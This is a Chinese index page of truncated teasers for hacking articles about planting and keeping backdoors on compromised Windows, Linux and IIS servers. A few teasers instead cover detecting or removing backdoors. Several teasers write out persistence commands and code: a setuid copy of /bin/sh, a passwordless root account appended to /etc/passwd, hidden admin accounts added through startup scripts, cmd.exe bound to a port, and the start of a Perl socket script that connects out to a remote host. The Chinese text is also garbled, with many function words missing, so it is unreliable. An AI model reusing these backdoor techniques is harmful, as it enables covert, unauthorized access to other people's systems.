来源:51CTOBO2000是个有名后门它可以搜集信息执行系统命令重新设置机器及重定向498)this.style.width=498;" border=0 图9-10 防范体系对BO2000后门攻击防护效果示意图 防火墙将攻击连接切断体系管理平台通知节点A抗毁系统启动进行信息完整性检查并使用防病毒软件Software清除该后门(该步骤般需要调动安全事件响应队伍进行响应工作可使用查杀病毒软... [阅读全文]

作者:灰狐 来源:灰狐’s Blog 注:本文已发表在黑客防线2008年第1期,转载请注明出处. NameLess大名都应该听说过吧估计还有相当多人用过呢个人认为这个后门非常经典我们再来简单看下有关它介绍:仅有个DLL文件平时不开端口,可以进行反向连接后门 这个后门早已经开源了网上流传最广是V1.14(稳定版)(我已经把这个版本完整源代码打包了)哈哈这样好事可千万不能错过哦立马从网上Down回来研... [阅读全文]

来源:安全中国大家都知道nc是个强大并且灵活黑客工具用他可以做很多事情譬如做为telnet客户端口譬如入侵时候反弹回来shell譬如扫描……但是你有没有想过将他打造成个服务级后门呢？现在好多跟我样菜鸟还不懂得编程别人写流行点后门又经常被杀那就跟我起来自己手工制作个后门吧不需要任何编程知识菜鸟级东东哦 首先请准备好不被杀nc.exe(随便加个壳就可以了)还有sc.exe(这个是操作服务个小工具被人称... [阅读全文]

文章来源于 安全中国.介绍. 我们经常可以从些搞linux入侵朋友那里听到他们讨论sk这个rootkit其实sk全称是suckit意为super user control kitsuckit这个可以说是目前运行于Linux 2.4内核下最好rootkit了 关键字:Linux后门 Rootkit Linux入侵 suckit adore-ng ELF感染 1、背景知识: ... [阅读全文]

对于我们这样菜手好不容易搞了台服务器很不容易如果被发现了就惨了其实开后门思路方法有很多种下面我来说说我以前学习过几种思路方法 1. Setuid #cp /bin/sh /tmp/.root#chmod u+s /tmp/.root 加上 suid 位到shell 上虽然很简单但容易被发现 2. Echo "hack::0:0::/:/bin/csh" /etc/passwd 即给系统增加个... [阅读全文]

以前写篇文章现在公布出来对编程感兴趣欢迎和我讨论呵！ 、前言 在当今微软当道年代找肉鸡已经不是什么难事各种各样傻瓜工具大大方便了菜鸟们入侵但是往往入侵成功了如何去做好后门把肉鸡尽可能久抓住往往困惑着像我样菜鸟们用过无数网上经典后门后在丢失了许多辛辛苦苦弄到肉鸡后我下定决心要写自己后门于是有了下面文章 2、Netbox介绍 个偶然机会我认识了NetboxNetbox是个使用脚本语言进行应用软件So... [阅读全文]

1、组策略启动脚本 利用过程:启动组策略(运行-gpedit.msc-计算机配置-Windows 设置-脚本(启动/关机) ) 2、启动和关机相关设置 选择启动-属性-添加会弹出选择脚本名选择 C:\windows\system32\net.exe参数 user admin /add 来执行 net user admin /add再同样添加C:\Windows\system32\net.exe l... [阅读全文]

经典软件Software被人插入了后门如何办?相信第时间你会想到杀毒软件Software但是它要履行起自己职责会不留个“活口”使其连带经典软件Software也并删除看来刚正不阿有时也是个如果能清除后门又不影响其经典软件Software正常使用该有多好于是经过笔者尝试终于得出“鱼和熊掌可以兼得”两全其美法!　　小提示:在做操作的前需要准备好被人恶意插入后门软件Software如果你无法确定某款软件... [阅读全文]

大家都知道nc是个强大并且灵活黑客工具用他可以做很多事情譬如做为telnet客户端口譬如入侵时候反弹回来shell譬如扫描……但是你有没有想过将他打造成个服务级后门呢？现在好多跟我样菜鸟还不懂得编程别人写流行点后门又经常被杀那就跟我起来自己手工制作个后门吧不需要任何编程知识菜鸟级东东哦首先请准备好不被杀nc.exe(随便加个壳就可以了)还有sc.exe(这个是操作服务个小工具被人称为操作服务军刀)... [阅读全文]

永远后门 IIS是比较流行www HttpErrors : (LIST) (32 Items) "400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm" "401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm" "401,2,FILE,C:\WINNT\help\iisHelp\common\401-2... [阅读全文]

BITS(Beat IT Security?)对商业IT Security开始觉得厌倦了SoLet's Beat IT Security :-) BITS其实是Background Intelligent Transfer Service缩写让我们暂时借用这个服务和名字吧BITS是个冒名顶替后门也可以在不知不觉中实现另种意义Background Intelligent Transfer Serv... [阅读全文]

作者:浅蓝辐射鱼　　来源:http://www.77yan.com/和海阳CS马样运行后会在主机“内存”里生成个php后门 只是我客户端多加了点选项使得对方可以进行多个选择来生成自己需要后门 其实这些后门也是由偶来抉择其实很简单你只要把php后门开头?去掉就可以了 代码: 代码: -----------------------------------------------------------... [阅读全文]

作者:黑病毒　　来自:冰点极限论坛 #!usr/bin/perl -w use IO::Socket; $remote_host=$ARGV[0]; $remote_port=$ARGV[1]; $sock=IO::Socket::INET-(LocalAddr=INADDR_ANY,LocalPort=7718,PeerAddr=$remote_host,PeerPort=$remot... [阅读全文]

来自:www.linuxforum.net 1. 帐号后门 检查/etc/passwd、/etc/shadow文件中如下帐号是否已经拥有合法登录shell、登录口令 bin、daemon、adm、lp、sync、shutdown、halt、mail、s、uucp、games、 gopher、ftp、nobody、xfs、named、gdm、sys、nuucp、listen /etc... [阅读全文]

这里是个创建windows服务绑定cmd.exe到1102口随计算机启动而自动开启服务Thread就是BindCmd2Port可以(最好是)自己定制可能需要修改变量在里面有注释如果你点都不改话那么用时候定要拷到path变量设定目录(比如c:\\winnt\\system32)中记得加上/参数以后telnet到1102口就可以了 如果要改话(最好是改下)把那个BindCmd2Port整个改掉吧我都... [阅读全文]

[初级] 最简单思路方法就是在口令文件 passwd 中增加个 UID 为 0 帐号但最好别这么做只要系统管理员检查口令文件就会“漏馅”了以下是在 /etc/passwd 口令文件中添加个 UID 0 帐号C backdoor/backdoor1.c # { FILE *fd; fd=fopen("/etc/passwd","a+"); fprf(fd,"hax0r::0:... [阅读全文]

参考文献: Article: backdoor from The Infinity Concept Issue II Src: b4b0.c by b4b0 Src: daemonsh.pl by van Hauser / [THC] in 1997' -- 千辛万苦(or 轻而易举)取得root后当然希望长久保持. 以被以后用来d0ing what u want t0 d0 :) 传统思路方... [阅读全文]

来自:www.linuxforum.net1. 帐号后门 检查/etc/passwd、/etc/shadow文件中如下帐号是否已经拥有合法登录shell、登录口令 bin、daemon、adm、lp、sync、shutdown、halt、mail、s、uucp、games、 gopher、ftp、nobody、xfs、named、gdm、sys、nuucp、listen /etc/passwd文件... [阅读全文]